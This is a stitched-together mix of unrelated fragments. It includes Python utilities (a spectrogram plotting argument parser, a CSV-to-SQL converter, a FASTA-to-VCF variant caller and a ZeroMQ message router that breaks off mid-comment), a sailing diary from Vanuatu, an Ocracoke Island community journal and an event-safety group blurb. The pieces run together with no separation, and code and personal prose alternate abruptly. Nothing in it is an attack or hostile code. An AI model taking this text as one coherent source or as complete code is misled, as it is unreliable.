    parser.add_argument('infile', type=argparse.FileType('rb'),
                        help="""Input spectrogram file""")
    parser.add_argument('outfile',
                        help="""Output figure file""")
    parser.add_argument('--dim', type=int, default=0,
                        help="""Dimension to plot (used in multidimensional
                        feature tracks)""")
    parser.add_argument('--scale', default=None,
                        help="""Scale to use in y-axis label""")
    # Bug fix: width/height are fractional inches, so they must be parsed as
    # float. With type=int, any explicit value such as the documented default
    # "3.45" was rejected by argparse.
    parser.add_argument('--width', type=float, default=3.45,
                        help="""Output width (inches).
                        Default: 3.45 (one column)""")
    parser.add_argument('--height', type=float, default=2.0,
                        help="""Output height (inches).
                        Default: 2.0""")
    args = parser.parse_args()

    plot(args.infile, args.outfile, args.scale, args.dim,
         (args.width, args.height))
do a lot at one time. When Mark went in to get on the internet, I stayed on the boat. It looked like rain, and yesterday’s laundry was still not dry. I wanted to leave it out, but be here to take it in if the skies opened up. Well, the skies didn’t “open up” but they drizzled all morning while the sun was shining. I took laundry in and put it back out, and took it in again and put it out again. It was that kind of day. woman there to take a message for us. We went into town to do some shopping and when we returned, we found Adrian waiting for us on the dinghy dock. He had called us back and left the message that he would be here at 3:00, but we were in town and didn’t get the message. In any event, he came out with us and once again tried to balance our system. Mark is still not sure things are quite right, but we will have to wait until about noon tomorrow before we can make that final determination. We have decided to check-out of Vanuatu on Wednesday and we have a reservation to fill-up with duty-free fuel on Thursday morning at 8 AM. It still looks like Friday is the best day to head to New Caledonia, but we will be ready to leave on Thursday afternoon if the weather should change in our favor. downtown shop but are anxious to see the gallery. I’m secretly hoping that we can go to Mele Island, also known as Hideaway Island, on Thursday after we get our fuel. We could spend the night there and leave for New Caledonia on Friday. But then, you are never supposed to start a crossing on a Friday, so maybe we will just have to leave on Thursday. We’ll have to keep you posted on this one.
#!/usr/bin/env jython
"""
ccsv2sql
Utility to convert a CSV file to a SQL dump.
Copyright 2015 Sam Saint-Pettersen.
Licensed under the MIT/X11 License.
Tweaked for Jython.
"""
import sys
import csv
import os
import re
import datetime
import getopt

signature = 'ccsv2sql 1.0.6 [Jython] (https://github.com/stpettersens/ccsv2sql)'


def displayVersion():
    """Print the program signature/version string."""
    print('\n' + signature)


def displayInfo():
    """Print the module docstring as usage information."""
    print(__doc__)


def ccsv2sql(file, out, separator, db, comments, verbose, version, info):
    """Convert a CSV file to a SQL dump.

    Column types are inferred from the first data row: ObjectId values become
    VARCHAR(24), ISO dates become TIMESTAMP, true/false become BOOLEAN,
    other non-numeric values become VARCHAR, and numbers become NUMERIC.

    :param file: input CSV path (must end in .csv)
    :param out: output SQL path (defaults to the input name with .sql)
    :param separator: CSV field separator (defaults to ',')
    :param db: optional database name emitted as a USE statement
    :param comments: include generation comments in the dump (default True)
    :param verbose: print progress information
    :param version: show version and exit (when no file/out is given)
    :param info: show usage and exit (when no file/out is given)
    """
    if len(sys.argv) == 1:
        displayInfo()
        sys.exit(0)
    if file is None and out is None:
        if not verbose and version and not info:
            displayVersion()
        elif not verbose and not version and info:
            displayInfo()
        sys.exit(0)
    if out is None:
        out = re.sub('.csv', '.sql', file)
    if not file.endswith('.csv'):
        print('Input file is not a CSV file.')
        sys.exit(1)
    if not out.endswith('.sql'):
        print('Output file is not a SQL file.')
        sys.exit(1)
    basename = os.path.basename(out)
    table = re.sub('.sql', '', basename)
    if separator is None:
        separator = ','
    if comments is None:
        comments = True

    # Read the header row (field names) and the data rows.
    fields = []
    rows = []
    csvfile = open(file, 'r')
    try:
        reader = csv.reader(csvfile, delimiter=separator)
        headers = True
        for row in reader:
            if headers:
                fields = separator.join(row).split(separator)
                headers = False
            else:
                rows.append(row)
    finally:
        csvfile.close()

    # Robustness: type inference below reads rows[0].
    if not rows:
        print('CSV file contains no data rows.')
        sys.exit(1)

    dtable = 'DROP TABLE IF EXISTS `%s`;' % table
    ctable = 'CREATE TABLE IF NOT EXISTS `%s` (\n' % table
    insert = 'INSERT INTO `%s` VALUES (\n' % table
    inserts = []

    # Hoist the patterns used for type/value detection out of the loops.
    date_pattern = re.compile(r'\d{4}\-\d{2}\-\d{2}')
    bool_pattern = re.compile('true|false', re.IGNORECASE)
    bool_null_pattern = re.compile('true|false|null', re.IGNORECASE)

    # Infer column types from the first data row.
    for x, value in enumerate(rows[0]):
        key = fields[x]
        fvalue = re.sub('\'|\"', '', value)
        tvalue = re.sub(r'\.', '', fvalue)
        if value.startswith('ObjectId('):
            ctable += '`%s` VARCHAR(24),\n' % key
        elif not tvalue.isdigit():
            # Bug fix: the original tested dates and booleans in two separate
            # `if` statements, so a date column also fell into the
            # BOOLEAN/VARCHAR else-branch and emitted a duplicate column
            # definition. The checks are now a single if/elif/else chain.
            if date_pattern.match(value):
                ctable += '`%s` TIMESTAMP,\n' % key
            elif bool_pattern.match(value):
                ctable += '`%s` BOOLEAN,\n' % key
            else:
                length = 50
                if key == 'description':
                    length = 100
                ctable += '`%s` VARCHAR(%d),\n' % (key, length)
        else:
            ctable += '`%s` NUMERIC(15, 2),\n' % key

    # Build one INSERT statement per data row.
    for row in rows:
        ii = ''
        for value in row:
            fvalue = re.sub('ObjectId|\(|\)|\'|\"', '', value)
            tvalue = re.sub(r'\.', '', value)
            if not tvalue.isdigit():
                if date_pattern.match(value):
                    # Normalize ISO timestamps: drop the 'T' separator and
                    # any milliseconds/timezone suffix.
                    fvalue = re.sub('T', ' ', fvalue)
                    fvalue = re.sub(r'\.\d{3}Z', '', fvalue)
                    fvalue = re.sub(r'\.\d{3}\+\d{4}', '', fvalue)
                if bool_null_pattern.match(value):
                    # Booleans and NULL are emitted unquoted, in uppercase.
                    ii += '%s,\n' % fvalue.upper()
                    continue
                ii += '\'%s\',\n' % fvalue
            else:
                ii += '%s,\n' % fvalue
        ii = ii[:-2]  # strip the trailing ",\n"
        inserts.append(insert + ii + ');\n\n')

    ctable = ctable[:-2]  # strip the trailing ",\n"
    ctable += ');'

    if verbose:
        print('\nGenerating SQL dump file: \'%s\' from\nCSV file: \'%s\'\n'
              % (out, file))

    f = open(out, 'w')
    try:
        f.write('-- !\n')
        if comments:
            # Bug fix: the format arguments were not parenthesized in the
            # original ("% table, file, out))"), which was a syntax error.
            f.write('-- SQL table dump from CSV file: %s (%s -> %s)\n'
                    % (table, file, out))
            f.write('-- Generated by: %s\n' % signature)
            f.write('-- Generated at: %s\n\n' % datetime.datetime.now())
        if db is not None:
            f.write('USE `%s`;\n' % db)
        f.write('%s\n' % dtable)
        f.write('%s\n\n' % ctable)
        for ins in inserts:
            f.write(ins)
    finally:
        f.close()


# Handle any command line arguments.
try:
    opts, args = getopt.getopt(sys.argv[1:], "f:o:s:d:nlvi")
except getopt.GetoptError:
    print('Invalid option or argument.')
    displayInfo()
    sys.exit(2)

file = None
out = None
separator = None
db = None
comments = None
verbose = False
version = False
info = False
for o, a in opts:
    if o == '-f':
        file = a
    elif o == '-o':
        out = a
    elif o == '-s':
        separator = a
    elif o == '-d':
        db = a
    elif o == '-n':
        # Bug fix: the original compared against 'n' (missing dash), so the
        # -n flag could never disable comments.
        comments = False
    elif o == '-l':
        verbose = True
    elif o == '-v':
        version = True
    elif o == '-i':
        info = True
    else:
        assert False, 'unhandled option'

ccsv2sql(file, out, separator, db, comments, verbose, version, info)
Overcast skies and cooler temperatures suggest impending rain later today, maybe even thunderstorms. Not too many folks out and about yet this morning, but we're anticipating more people stopping by as the day progresses, especially if a light rain keeps them off the beach! It's hard to believe, but June is almost upon us. Summer vacations have already started, although it won't be until mid-June, after high school graduations, that the season really picks up. The island's next big event is coming up the first weekend in June -- our annual Ocrafolk Festival of Music & Storytelling. If you're on the island, stop by and say hello. On Wednesday, May 26, "Green Tuna" inquired, "I'd be interested to know...how many people have graduated from Ocracoke [School]...ever?" Two weeks from now, on June 13, four seniors will receive their diplomas -- Jimmy Wrobleski, Amara Wollerman, Tucker Payne, and Brandon Lawson. They will make a total of 446 island students who have "walked down the aisle" since the first graduating class in 1931. That's an average of just over 6 seniors each year. Today is another virtually perfect day with sunny skies and temperatures in the 80's. Every now and then I will be sharing a distinctive Ocracoke Island word or expression. Today's word is "fladget." It means a small piece or chunk of something, generally food, as in "Cut me a fladget of meat, please." It can also be used in other ways, as in "I tore a fladget of skin off my finger when I was opening clams." Look for more words in the future. With High School graduations approaching I am reminded of those many T-shirts that list all of the graduating seniors on the back of the shirt. Ocracoke School has a T-shirt that lists every person who has ever graduated from the school! Kevin Cutler reminded me that twice in Ocracoke's history the graduating class consisted of only one senior: Walter Potter Garrish in 1947 and Elmo Murray Fulcher in 1957. In 1946 & 1955 there were no graduates. 
On May 24, 1921 the schooner "Mary J. Haynie" wrecked on Ocracoke's beach. On today's date, May 25, in 1884 the steamer "Glasbolt" from Scotland wrecked at Ocracoke's South Point. Relatively small portions of a few of the many shipwrecks along our coast can still sometimes be seen on the beach. Most of them are covered by sand but may be exposed after storms and hurricanes. Within the last couple of months some old coins were found on the beach. Metal detectors are illegal in the National Seashore, but keep your eyes open! A couple of days ago two folks who joined me for my Ghost & History Walk (I know this is another blatant and transparent plug for my new venture), stopped into Cathy Scarborough's shop, "Over the Moon." Cathy's daddy, and my good friend, Al, was working the counter when Myrna & Marilyn commented on how wonderful the Tuesday evening tour was. They talked about Rob Hanks who, in the mid 1950's, would "tell the story of Ocracoke" for a dime. I like to point out that property values have risen about 1000 times in the last fifty years, and at the same rate of inflation my tour should be worth $100.00 (so, of course, it's a terrific bargain at only $12.00). Al, being the curmudgeon that he is, reminded these two very nice women that a soft drink which sold for a nickel in 1955 could be bought today for only 65 cents. That, he asserted, would make my tour only worth $1.30! As I was waking up this morning it occurred to me that Rob Hanks' "Story of Ocracoke" only took about 10 minutes to relate. So even by Al's reckoning my 95 minute tour is still a bargain at $12.00. "His deductions and conclusions are always logical, plausible, stimulating, and delivered with clarity and pungency. Unfortunately they are nearly always mistaken." Lucky me! My neighbors (neighbors for the week that is -- down from Maine for a little vacation) have invited me over for fish and fresh clams that they gathered out in Pamlico Sound this afternoon. 
At noon our family met at Cafe Atlantic for brunch to celebrate my daughter, Amy's, birthday. Life is good! Finally, last night, the village was treated to rain. It came down in torrents to water our yards, trees, and gardens. By morning the sky was bright and sunny again. Every morning, when I turn on the water in my outdoor shower, my tiny green neighbor who hangs out behind the shampoo bottle, starts a-croaking. He's a friendly fellow, and I enjoy his early morning singing. And, of course, streets & shops bustling with visitors. Is bare now, nor can foot feel, being shod." I think of this poem often when I walk along the beach barefooted. To be sure, the village of Ocracoke, like so many places, is constantly threatened by development. As beautiful as it can be, it also "wears man's smudge" so to speak. But Ocracoke still retains a vibrant sense of community, a strong connection with it's 275 year old history, and is a tranquil respite from so much of the rest of the modern world. And as I stroll barefooted along our pristine 16 miles of undeveloped beach I know that here is one place where foot can feel. The water is cool, the sand soft under my feet. At places I feel the rough "gravel" of thousands of tiny, broken pieces of shell. Elsewhere I feel the silky, fine grains of sand push up between my toes. Sometimes the sand is searingly hot. It burns at the bottom of my "winter feet." I find relief in the shade of a cedar tree along the path that leads back to the road. Today I avoid the "pickle pears" that line the path, but I encounter a lone sand spur that lodges under my big toe. I still can feel the earth under my feet. There lives the dearest freshness deep down things." Temperatures are expected to be in the low 80's again today under sunny skies. Chance of rain is a slight 20%. But the price is wilting plants and parched lawns. Island visitors continue to enjoy the pleasant weather and warming ocean. 
Imagine walking down a narrow path, through wax myrtles, yaupons, and cedars. The path opens into an open sandy expanse where prickly pear cacti (referred to on the island as "pickle pears") are just beginning to open up into bright yellow flowers. Through breaks in the dunes you can see the ocean sparkling in the distance. Once on the beach the water is divided into three distinct hues -- darker and slightly murky near shore where the breakers churn up sand from the bottom, deep rich blue at the horizon, and a magnificent aquamarine (almost emerald) color just beyond the breakers. Such a view I had this afternoon on my daily walk along the shore and dip in the cooling water. -- graceful dolphin fins cutting through the water close enough to shore that it wouldn't be very difficult to swim out to them. The days have been so beautiful for so long that inside work just piles up, neglected. Oh well....., I guess that's one disadvantage of living in a great community just minutes from one of the best beaches in the United States. Congratulations to all the Spring graduates out there. Don't forget your trip to the island this summer. Everyone needs time to "wind down" now and then, and Ocracoke is the perfect place for that. The tide was low late this morning as I walked along the surf, and dolphins were swimming just beyond the breakers. The water is still cool, but incredibly refreshing, especially since the temperature is in the mid-80's. It's beginning to feel like summer on the island. Not so many visitors yet, but the temperature is in the 80's today, under bright, clear skies. Folks are already enjoying ocean swimming, as well as biking, kayaking, & sailing. In case you don't know about the Ocrafolk Festival coming up the first weekend in June, click here for information, and make plans now to join us for a wonderful weekend of music and storytelling. 
Although there aren't as many gardens on the island today as there were in years gone by, gardens have always been a major part of life on Ocracoke. In other news, tonight is the annual pot luck dinner and general membership meeting of the Ocracoke Preservation Society. We recommend that you stop by the museum on your next visit to the island. You can learn a lot about island life & the history of Ocracoke (and your donation, large or small, will help preserve our island heritage!). Ocracoke is a wonderful place to live, and definitely no longer as isolated as it once was. Today 7 Buddhist monks from Thailand visited the island and offered a meditation/blessing on the deck at Thai Moon restaurant. Certainly an Ocracoke experience my grandparents never had! A special greeting to Snee (my daughter-in-law), the mother of Zoe, Eakin, & Eliza; and to Amy (my daughter), the soon-to-be-mother of my fourth grandchild. These younguns are the 10th generation of our island family. It's a quiet day on Ocracoke -- the perfect opportunity to relax, work in the garden, take a dip in the ocean, or lie in the hammock and read a good book. No community meetings, or other responsibilities, and the temperature is in the mid-70's again, under clear skies. Island life is pretty wonderful! It's another beautiful Spring day, with temperatures in the 70's, bright skies, and a light breeze. Ocracoke Preservation Museum's featured 2004 exhibit includes paintings & sketches by JoKo, well-known Outer Banks artist of the last half of the 20th century. Some of you may remember when JoKo spent much of his summers on Ocracoke in the 1960's through the 1980's. The Museum's off-season hours are Monday - Saturday, 10 - 4. Today at 11 am the British War Graves Commission and the US Coast Guard will hold their annual memorial service at Ocracoke's British Cemetery. Between January and July, 1942 nearly 400 ships, mostly merchant vessels, were sunk or damaged by German U-boats. 
About 5000 people were killed or injured. The British Cemetery is the site of four graves of seamen whose bodies washed ashore on Ocracoke's beach in May of 1942 -- Lt Thomas Cunningham, Stanley R. Craig, AB, and two unknown sailors. All were from the ill-fated British ship, HMS Bedfordshire. Three photos from today's lighthouse "open house" (see the earlier post today for an explanation): Visitors to the island often ask if they can climb the lighthouse. Unfortunately, this is not allowed. There are, of course, good reasons for this. -- The lighthouse (built in 1823) is more than 180 years old. -- The final 8 feet of the climb is by means of a narrow, steep ladder. -- The access to the light is nothing more than a hatch in the floor. -- The light & the fresnel lens take up most of the space at the top of the tower, leaving little room for visitors. -- The door onto the balcony is only about 4 feet high. -- The railing around the balcony was not designed to keep toddlers or small children from slipping off the edge. In short, the Ocracoke lighthouse was designed for a lighthouse keeper, not for visitors. However, on special occasions (most notably, July 4) the base of the lighthouse is often opened to the public by the National Park Service. Today, between 10 am and 3 pm, the lighthouse will also be open for public viewing. Gail Fox, one of our newer rangers, realized that many local residents had never been inside the lighthouse (most islanders work all day on the 4th of July). So she arranged to have the door open today for the general public, and especially for Ocracokers. Many thanks to Gail for her thoughtful consideration. Another beautiful, but cool, Spring day. It's cooler today (in the upper 50's) and breezy, but sunny and beautiful, after a bit of rain yesterday. We published our latest Ocracoke Newsletter yesterday, the story of aviation and Ocracoke Island. 
The Newsletter also has information about Phil Platt's new air service connecting the island with Norfolk, Virginia and New Bern, North Carolina. To read the Newsletter just click here. Today, tomorrow, and Wednesday are important days for island residents. A driver's license & vehicle registration card with an Ocracoke address will entitle islanders to a renewed Hatteras Inlet ferry priority pass. There may be times when you are waiting in line for an hour or more in the sweltering summer heat, hoping to board the next ferry, only to see someone pull up in the priority lane and be loaded before you are. As frustrating as this can be, please understand how it was for island residents before priority passes were issued. I remember well how difficult it was to spend 7 or 8 hours making a round trip to the dentist, and then to sit for several hours waiting in line just to get home. It's even harder on elderly residents and small children, especially if they're coming home from a doctor's appointment, or even the hospital. Because so much of our "routine business" (clothes shopping, appointments with eye doctors, a trip to a large convenience store, grocery shopping, certain automobile repairs, school basketball games, jury duty, etc.) entails lengthy round trips "off-island" we are all thankful for this small concession to our local needs. The Ocracoke Journal resumes today. I'm home again, after spending a week in Indiana visiting a dear friend who had eye surgery. She is doing well and looking forward to enjoying the summer on Ocracoke. Her eye patch will be stashed away by then, but maybe she'll bring it out now and then in remembrance of Anne Bonney, Mary Reed, and assorted other pirates. I arrived home yesterday to discover everything outdoors covered with oak leaves (live oaks shed in the Spring, not the Fall) and debris from pollinating cedar trees. 
It's quite a mess, and there's occasional light rain, but the days are warm and pleasant (Indiana was beautiful, but it actually snowed there last week!).
#!/usr/bin/env python
"""Updated version of VCF_from_FASTA.py that hopefully will simplify the
process of generating a VCF from Sanger reads aligned to a reference sequence.
Requires Biopython. Assumes the reference sequence is the first one in the
alignment. Takes one argument:
    1) FASTA multiple sequence alignment"""

import sys
import re
from datetime import date

try:
    from Bio import SeqIO
    fa_in = sys.argv[1]
except ImportError:
    sys.stderr.write('This script requires Biopython.\n')
    sys.exit(1)
except IndexError:
    sys.stderr.write(__doc__ + '\n')
    sys.exit(2)


def extract_ref_coords(alignment, ref_idx=0):
    """Extract the name and the coordinates from the reference sequence of the
    alignment. This expects the sequence to be named in SAM/BED region format
    (chrom:start-end); returns (chrom, start) as strings."""
    ref = alignment[ref_idx]
    chrom = ref.name.split(':')[0]
    start = ref.name.split(':')[1].split('-')[0]
    return (chrom, start)


def check_ref_gaps(alignment, ref_idx=0):
    """Check the reference sequence for end gaps. If we find any end gaps on
    the left, we will throw an error because we cannot accurately calculate
    the positions relative to reference. If we find them on the right, we will
    throw a warning, but continue anyway."""
    ref = alignment[ref_idx]
    refseq = str(ref.seq)
    # Leading/trailing runs of '-' before/after the first/last IUPAC base.
    left_gap = re.compile(r'^-+[ACGTMRWSYKVHDBNacgtmrwsykvhdbn]')
    right_gap = re.compile(r'[ACGTMRWSYKVHDBNacgtmrwsykvhdbn]-+$')
    if left_gap.match(refseq):
        sys.stderr.write(
            """Error: Reference sequence has end-gaps on the left. This will cause calculated positions to be incorrect. Please remove the end gaps and re-run this script. """)
        sys.exit(10)
    if right_gap.search(refseq):
        sys.stderr.write(
            """Warning: reference sequence has end-gaps on the right. This is not an error, but some of the variants at the end of the alignment will not be placed on the reference sequence. You may either remove the right end-gap or remove the variants from the resulting VCF that occur in the end-gap.\n""")
    return


def check_columns(alignment, ref_idx=0):
    """Check all of the columns of the alignment for those that are all gaps
    or all N. Print a list of indices and exit if it finds any."""
    no_data = []
    raw_aln = [list(s.seq) for s in alignment]
    # Transpose it so we iterate over columns
    t_aln = zip(*raw_aln)
    refpos = 0
    for index, column in enumerate(t_aln):
        ref_base = column[ref_idx]
        # Calculate the states that are present in this column
        states = {s.upper() for s in column}
        # Throw out gaps and Ns
        states.discard('-')
        states.discard('N')
        # If there are no states left, then we append it to the list
        if not states:
            no_data.append((refpos + 1, index + 1))
        # Only advance the reference coordinate on non-gap reference bases.
        if ref_base != '-':
            refpos += 1
    # Now, if no_data has values in it, then we will print them out here
    if no_data:
        message = """The following positions (1-based) were found to be either all gaps or all N in your alignment: {refpos} in the reference sequence, or {alnpos} in the aligned sequences.\n""".format(
            refpos=', '.join([str(i[0]) for i in no_data]),
            alnpos=', '.join([str(i[1]) for i in no_data]))
        sys.stderr.write(message)
        sys.exit(2)
    return


def extract_variants(alignment, ref_idx=0):
    """Extract the positions of SNPs and indels in the Sanger reads aligned to
    the reference sequence.

    Returns (snp_pos, indel_pos) where each SNP record is
    (ref_offset, ref_state, alt_states, n_non_missing, min_count, min_freq)
    and each indel record is (ref_offset, aln_pos, ref_state, alt_states)."""
    snp_pos = []
    indel_pos = []
    # First, convert the alignment to a list of lists, as opposed to a list
    # of SeqRecord objects
    raw_aln = [list(s.seq) for s in alignment]
    # Transpose it so that we iterate over columns of the alignment
    t_raw_aln = zip(*raw_aln)
    # Start iterating across columns and saving positions of variant sites. We
    # keep track of the reference base and only increment the position counter
    # for when we see a non-gap character in the reference sequence.
    offset = 0
    for aln_pos, aln_column in enumerate(t_raw_aln):
        # First, get the states that exist at this position. Transform them
        # all to uppercase characters.
        upper_col = [s.upper() for s in aln_column]
        states = set(upper_col)
        # Discard any 'N' bases
        states.discard('N')
        # And get the ref state
        ref_state = aln_column[ref_idx]
        # Use the ref state to get the alternate states. Bug fix: `states`
        # holds uppercased characters, so we must subtract the uppercased
        # reference base; subtracting a lowercase base never removed it.
        alt_states = states - {ref_state.upper()}
        # If there is a gap in this position, then we will append it to the
        # list of indel positions
        if '-' in states:
            indel_pos.append((offset, aln_pos, ref_state, alt_states))
        # Then, discard the gap character to look for SNPs
        states.discard('-')
        # If the length of the states is greater than 1, then we have a SNP
        if len(states) > 1:
            # We will calculate the following:
            #   Number of non-missing alleles
            #   Minor allele count
            #   Minor allele frequency
            # The reference IS included in these calculations.
            # Bug fix: the original filter used `base != '-' or base != 'N'`,
            # which is always true, so gaps and Ns were counted as
            # non-missing and the allele frequencies were deflated. We also
            # count on the uppercased column so that lowercase bases are
            # tallied consistently with `states`.
            non_missing = [
                base for base in upper_col
                if base != '-' and base != 'N']
            acs = [upper_col.count(x) for x in states]
            afs = [float(c) / len(non_missing) for c in acs]
            # Re-discard the gap character, just to be sure we do not count it
            # as an alternate state
            alt_states.discard('-')
            snp_pos.append(
                (offset,
                 ref_state,
                 alt_states,
                 len(non_missing),
                 min(acs),
                 min(afs)))
        # If the reference sequence is not a gap, then we increment our offset
        # counter.
        if ref_state != '-':
            offset += 1
    return (snp_pos, indel_pos)


def collapse_indels(indels):
    """Collapse indels by identifying runs of consecutive integers and merging
    those into a single entry."""
    # Sort the indel bases by their aligned position
    indel_srt = sorted(indels, key=lambda x: x[1])
    # Make a list to hold our aggregated indels
    agg_indel = []
    # We will now iterate over adjacent records - if they are consecutive, then
    # merge them. Else, break it and start a new record.
    curr_indel = []
    for ind, ind_adj in zip(indel_srt, indel_srt[1:]):
        # Unpack the alleles. It's a little silly, but we have to cast the set
        # to a list to subset it.
        # NOTE(review): this takes an arbitrary element when there are
        # multiple alternate states at an indel column — confirm multi-allelic
        # indels are out of scope for this pipeline.
        curr_ref = ind[2]
        curr_alt = list(ind[3])[0]
        adj_ref = ind_adj[2]
        adj_alt = list(ind_adj[3])[0]
        if not curr_indel:
            curr_indel = [ind[0], ind[1], curr_ref, curr_alt]
        # If the next position is not consecutive, append it and start over
        if ind_adj[0] - ind[0] > 1:
            agg_indel.append(curr_indel)
            curr_indel = [ind_adj[0], ind_adj[1], adj_ref, adj_alt]
        else:
            curr_indel[2] += adj_ref
            curr_indel[3] += adj_alt
    # The way we are iterating through the indel list means that we will
    # always leave off the last one. Append it after the loop finishes.
    agg_indel.append(curr_indel)
    return agg_indel


def adjust_indels(indels, alignment, ref_idx=0):
    """Adjust the indel positions so that they are offset by one, as required
    by the VCF spec. This is because the reported position must be the base
    *before* any insertion/deletion polymorphism is observed."""
    spec_indels = []
    # Remove the gaps from the reference sequence for getting the reference
    # base of the indel
    ref_seq = ''.join(
        [base for base in alignment[ref_idx].seq if base != '-'])
    for i in indels:
        # NOTE(review): an indel at reference offset 0 yields spec_pos = -1,
        # which indexes the *last* reference base — confirm that leading
        # indels cannot occur here (check_ref_gaps rejects left end-gaps).
        spec_pos = i[0] - 1
        spec_ref = ref_seq[spec_pos]
        spec_indel = [spec_pos, spec_ref + i[2], spec_ref + i[3]]
        spec_indels.append(spec_indel)
    return spec_indels


def print_vcf(snp_var, ind_var, refseq, offset):
    """Print a VCF from the calculated positions of the variants."""
    # Define the VCF header
    today = date.today().strftime('%Y%m%d')
    vcf_header = """##fileformat=VCFv4.1
##fileDate={filedate}
##source=VCF_from_FASTA_2.py;Morrell Lab @ UMN
##INFO=<ID=MAC,Number=1,Type=Integer,Description="Minor allele count">
##INFO=<ID=MAF,Number=1,Type=Float,Description="Minor allele frequency">
##INFO=<ID=NS,Number=1,Type=Integer,Description="Number of samples with data">
##INFO=<ID=SNP,Number=0,Type=Flag,Description="Variant is a SNP">
##INFO=<ID=INDEL,Number=0,Type=Flag,Description="Variant is an INDEL">
#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO""".format(filedate=today)
    print(vcf_header)
    # Sort the SNPs and indels by their offset and print the records
    srt_variants = sorted(snp_var + ind_var, key=lambda x: x[0])
    for v in srt_variants:
        # Set the chromosome and position: add 1 to account for 1-based
        # nature of VCF
        v_chr = refseq
        v_pos = str(int(offset) + v[0] + 1)
        v_id = '.'
        v_qual = '40'
        v_filter = '.'
        # This is a bit of a hack, but if we have more than three fields,
        # then the variant type is a SNP
        if len(v) > 3:
            # We also have to replace gap characters with N for the reference
            # allele in the cases where a SNP occurs in a gapped part of the
            # reference.
            v_ref = v[1].replace('-', 'N')
            # A bit ugly, but we have to cast the alt alleles from set to list
            v_alt = ','.join(list(v[2]))
            v_info = ';'.join([
                'MAC=' + str(v[4]),
                'MAF=' + str(v[5]),
                'NS=' + str(v[3]),
                'SNP'])
        else:
            # Replace the gap characters with N
            v_ref = v[1].replace('-', 'N')
            v_alt = v[2].replace('-', 'N')
            v_info = 'INDEL'
        # Print the line
        print('\t'.join([
            v_chr, v_pos, v_id, v_ref, v_alt, v_qual, v_filter, v_info]))
    return


def main(fasta):
    """Main function."""
    # Store the alignment object as a list
    aln = list(SeqIO.parse(fasta, 'fasta'))
    # Extract the chromosome name and start position from the name of the
    # reference sequence.
    chrom, start = extract_ref_coords(aln)
    # We should check the reference sequence, too. If there are end-gaps on
    # the reference sequence, then we can't accurately calculate positions in
    # the alignment.
    check_ref_gaps(aln)
    # Also check for aligned positions that are all N or all gaps
    check_columns(aln)
    snps, indels = extract_variants(aln)
    # Next, we want to collapse indels. We can find these by identifying runs
    # of consecutive integers in the list of indels. Some of the variants that
    # are in the list of indels are SNPs that occur within sequences that are
    # also part of a length polymorphism. We can just treat them as indels for
    # this routine.
    c_indels = collapse_indels(indels)
    # We also have to adjust the indels: the VCF spec requires that the
    # position of the indel be the base *before* the length polymorphism
    a_indels = adjust_indels(c_indels, aln)
    # Then, print the VCF!
    print_vcf(snps, a_indels, chrom, start)
    return


main(fa_in)
Get involved with Safety First! Join our mailing list to hear about upcoming trainings, office hours, and other events! Email us sfp at stumptownsyndicate dot org to find out how to schedule a workshop. We recommend scheduling incident response training about one month before your event is scheduled to take place. Follow the GitHub repository for this site and help us make it better. Our materials are open source.
#!/usr/bin/env python3

"""
Created on January 9 11:39:15 2016

@author: Alan Yorinks
Copyright (c) 2016 Alan Yorinks All right reserved.

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public
License as published by the Free Software Foundation; either
version 3 of the License, or (at your option) any later version.

This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.

You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""

import os
import signal
import socket
import sys
import time

import zmq

from xideco.data_files.port_map import port_map


# noinspection PyUnresolvedReferences,PyUnresolvedReferences,PyUnresolvedReferences,PyUnresolvedReferences,PyUnresolvedReferences
class XidecoRouter:
    """
    Central ZeroMQ message router for Xideco.

    This class consists of a PAIR connection to a control program bridge
    (i.e. - HTTP for Scratch), creates a publisher for Scratch commands,
    and creates a set of subscribers to listen for board data changes.

    It binds a SUB socket (everything published to the router) and a PUB
    socket (everything republished by the router) and wires them together
    with a zmq FORWARDER device.
    """

    def __init__(self):
        """
        This is the constructor for the XidecoRouter class.

        Discovers the local IP address, locates the xideco configuration
        directory on sys.path, creates the SUB/PUB socket pair from the
        ports in port_map, and starts the FORWARDER device.

        :param: use_port_map: If true, use the ip address in the port map,
                              if false, use discovered ip address
        :return: None
        """
        # figure out the IP address of the router
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        # use the google dns
        # NOTE(review): connecting a UDP socket to port 0 works on Linux but
        # may raise on other platforms — confirm; a real port (e.g. 80) is safer.
        s.connect(('8.8.8.8', 0))
        # getsockname() reveals the local interface address chosen by the OS
        self.ip_addr = s.getsockname()[0]

        # identify the router ip address for the user on the console
        print('\nXideco Router - xirt')
        print('\n******************************************')
        print('Using router IP address = ' + self.ip_addr)
        print('******************************************')

        # find the path to the data files needed for operation
        path = sys.path

        self.base_path = None

        # get the prefix
        prefix = sys.prefix
        for p in path:
            # make sure the prefix is in the path to avoid false positives
            if prefix in p:
                # look for the configuration directory
                s_path = p + '/xideco/data_files/configuration'
                if os.path.isdir(s_path):
                    # found it, set the base path
                    self.base_path = p + '/xideco'
                    break

        if not self.base_path:
            # cannot run without the data files; bail out
            print('Cannot locate xideco configuration directory.')
            sys.exit(0)

        print('\nIf using the port map, port_map.py is located at:\n')
        print(self.base_path + '/data_files/port_map\n')
        print('NOTE: The path to port_map.py may be different')
        print('for each Operating System/Computer.')
        print('\nSet the router_ip_address entry in port_map.py ')
        print('to the address printed above for each ')
        print('computer running Xideco, or optionally ')
        print('set the address manually for each Xideco module')
        print('using the command line options.\n')

        self.router = zmq.Context()

        # establish router as a ZMQ FORWARDER Device

        # subscribe to any message that any entity publishes
        self.publish_to_router = self.router.socket(zmq.SUB)
        bind_string = 'tcp://' + self.ip_addr + ':' + port_map.port_map[
            'publish_to_router_port']
        self.publish_to_router.bind(bind_string)

        # Don't filter any incoming messages, just pass them through
        self.publish_to_router.setsockopt_string(zmq.SUBSCRIBE, '')

        # publish these messages
        self.subscribe_to_router = self.router.socket(zmq.PUB)
        bind_string = 'tcp://' + self.ip_addr + ':' + port_map.port_map[
            'subscribe_to_router_port']
        self.subscribe_to_router.bind(bind_string)

        # NOTE(review): per the pyzmq docs, zmq.device() runs the forwarding
        # loop and does not return until the context is terminated, so this
